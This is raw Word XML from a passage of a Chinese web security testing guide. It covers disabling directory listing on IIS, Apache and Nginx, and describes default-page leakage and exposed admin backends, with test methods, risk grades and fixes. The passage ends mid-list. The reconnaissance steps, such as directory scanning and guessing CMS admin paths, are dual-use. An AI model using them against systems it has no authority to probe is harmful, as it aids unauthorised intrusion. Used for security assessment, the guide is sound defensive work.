        </w:rPr>
        <w:tab/>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中关闭目录浏览功能：在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的网站属性中，勾去“目录浏览”选项，重启</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113F397F" w14:textId="77777777" w:rsidR="00F80308" w:rsidRPr="00F907A7" w:rsidRDefault="00F80308" w:rsidP="00F907A7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中关闭目录浏览功能：打开</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpd.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，查找“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Options Indexes FollowSymLinks</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，修改为“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Options -Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>减号表示取消，保存退出，重启</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6031AF" w14:textId="0D49A23F" w:rsidR="00757422" w:rsidRDefault="00F80308" w:rsidP="00F907A7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中默认不会开启目录浏览功能，若您发现当前已开启该功能，可以编辑</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nginx.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，删除如下两行：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>autoindex on;autoindex_exact_size on;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重启</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5333A980" w14:textId="7FFA8457" w:rsidR="00403119" w:rsidRPr="00F907A7" w:rsidRDefault="00403119" w:rsidP="00F907A7">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FDDFE56" w14:textId="236B8EA2" w:rsidR="00757422" w:rsidRPr="00B73DD5" w:rsidRDefault="000C0F17" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc498434480"/>
      <w:r w:rsidRPr="00B73DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认页面泄漏</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="64B9A6BA" w14:textId="11BC7DF5" w:rsidR="00757422" w:rsidRPr="00940760" w:rsidRDefault="00757422" w:rsidP="00940760">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00AC4532" w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在默认安装中间件、插件、框架等会携带示例页面及说明文档。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413E0BE8" w14:textId="77777777" w:rsidR="00757422" w:rsidRPr="00940760" w:rsidRDefault="00757422" w:rsidP="00940760">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045B9110" w14:textId="35A51301" w:rsidR="00757422" w:rsidRPr="00940760" w:rsidRDefault="008D7A0A" w:rsidP="00940760">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描器或目录扫描器扫描</w:t>
      </w:r>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用进行检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCD522D" w14:textId="53E34FDD" w:rsidR="008D7A0A" w:rsidRPr="00940760" w:rsidRDefault="008D7A0A" w:rsidP="00940760">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据网站使用的第三方组件和框架手工输入对应的示例页面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B34D1" w14:textId="1529AA18" w:rsidR="00757422" w:rsidRPr="00940760" w:rsidRDefault="00C24790" w:rsidP="00940760">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="009D20FC" w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可利用</w:t>
      </w:r>
      <w:r w:rsidR="00E77C7B" w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认页面</w:t>
      </w:r>
      <w:r w:rsidR="00ED00F1" w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的功能和信息对服务器进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6046148F" w14:textId="77777777" w:rsidR="00757422" w:rsidRPr="00940760" w:rsidRDefault="00757422" w:rsidP="00940760">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F9B98" w14:textId="76EEB26C" w:rsidR="00757422" w:rsidRPr="00940760" w:rsidRDefault="000D19B2" w:rsidP="00940760">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00315465" w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在可访问默认页面，泄露高风险敏感信息（如：</w:t>
      </w:r>
      <w:r w:rsidR="00315465" w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">tomcat </w:t>
      </w:r>
      <w:r w:rsidR="00315465" w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00315465" w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> examples </w:t>
      </w:r>
      <w:r w:rsidR="00315465" w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2650D68A" w14:textId="018ABC81" w:rsidR="000D19B2" w:rsidRPr="00940760" w:rsidRDefault="000D19B2" w:rsidP="00940760">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00315465" w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在可访问默认页面，泄露于业务、操作和配置相关的敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8A798A" w14:textId="1E68BB5A" w:rsidR="000D19B2" w:rsidRPr="00940760" w:rsidRDefault="000D19B2" w:rsidP="00940760">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00315465" w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在可访问的默认页面，但未泄露敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4623F3" w14:textId="445AD576" w:rsidR="00757422" w:rsidRDefault="00757422" w:rsidP="00940760">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="002760EA" w:rsidRPr="00940760">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议在不影响业务的前提下删除默认页面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B3EC93" w14:textId="7E8F9F06" w:rsidR="00403119" w:rsidRPr="00940760" w:rsidRDefault="00403119" w:rsidP="00940760">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D053129" w14:textId="3118B021" w:rsidR="00757422" w:rsidRPr="00B73DD5" w:rsidRDefault="000C0F17" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc498434481"/>
      <w:r w:rsidRPr="00B73DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在可访问的管理后台入口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="5B1B957C" w14:textId="44025CEA"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="009569E4" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用存在未限制访问的后台，或者能</w:t>
      </w:r>
      <w:r w:rsidR="00216431" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接登录管理后台。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30322DAA" w14:textId="50457B2B"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14931357" w14:textId="2271535B" w:rsidR="000D6C8B" w:rsidRPr="00215B4A" w:rsidRDefault="006F702E" w:rsidP="00215B4A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描器或目录扫描器扫描</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用进行检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70978879" w14:textId="34802440" w:rsidR="006F702E" w:rsidRPr="00215B4A" w:rsidRDefault="00CD2844" w:rsidP="00215B4A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>识别网站使用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cms</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架，判断其默认的管理后台地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3516BB7D" w14:textId="76E393BE" w:rsidR="00081C95" w:rsidRPr="00215B4A" w:rsidRDefault="00081C95" w:rsidP="00215B4A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在网站中寻找管理后台超链接</w:t>
      </w:r>
